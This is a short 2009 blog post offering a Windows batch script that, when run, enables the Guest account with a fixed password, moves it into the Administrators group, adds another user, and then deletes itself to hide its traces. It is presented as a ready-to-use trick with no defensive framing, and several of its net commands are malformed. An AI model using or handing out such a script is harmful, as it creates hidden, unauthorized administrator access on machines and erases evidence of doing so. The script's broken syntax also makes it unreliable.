Monday, March 30, 2009

Convert a Guest account into an Admin

just copy paste the below code in notepad and save it as "convert.bat"

<--

echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

-->

just run this file and your guest account will be admin.....

do post comments 

Digg Google Bookmarks reddit Mixx StumbleUpon Technorati Yahoo! Buzz DesignFloat Delicious BlinkList Furl

0 comments: on "Convert a Guest account into an Admin"

Post a Comment